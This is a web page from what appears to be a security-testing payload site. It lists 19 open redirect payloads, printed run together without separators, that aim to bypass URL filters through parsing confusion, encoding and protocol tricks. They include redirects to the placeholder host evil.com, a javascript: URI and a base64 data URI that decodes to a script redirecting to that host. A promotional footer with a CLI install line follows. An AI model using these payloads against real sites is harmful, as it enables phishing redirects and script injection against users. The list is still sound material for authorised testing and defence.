$loading...
Open redirect payloads for URL parsing confusion, protocol tricks, and filter bypass techniques. (19 payloads)
//evil.comhttps://evil.comjavascript:alert(document.domain)data:text/html;base64,PHNjcmlwdD5sb2NhdGlvbj0naHR0cHM6Ly9ldmlsLmNvbSc8L3NjcmlwdD4=\\evil.com\/\/evil.comhttps://trusted.com@evil.comhttps://trusted.com%40evil.comhttps://evil.com#trusted.comhttps://evil.com?trusted.comhttps://trusted.com.evil.comhttps://eviltrusted.com/%0d/evil.com/evil.com/%2f..https:%2f%2fevil.com%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6dhttps%3A%2F%2Fevil.comhttp://evil.com%E3%80%82//evil%E3%80%82comLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides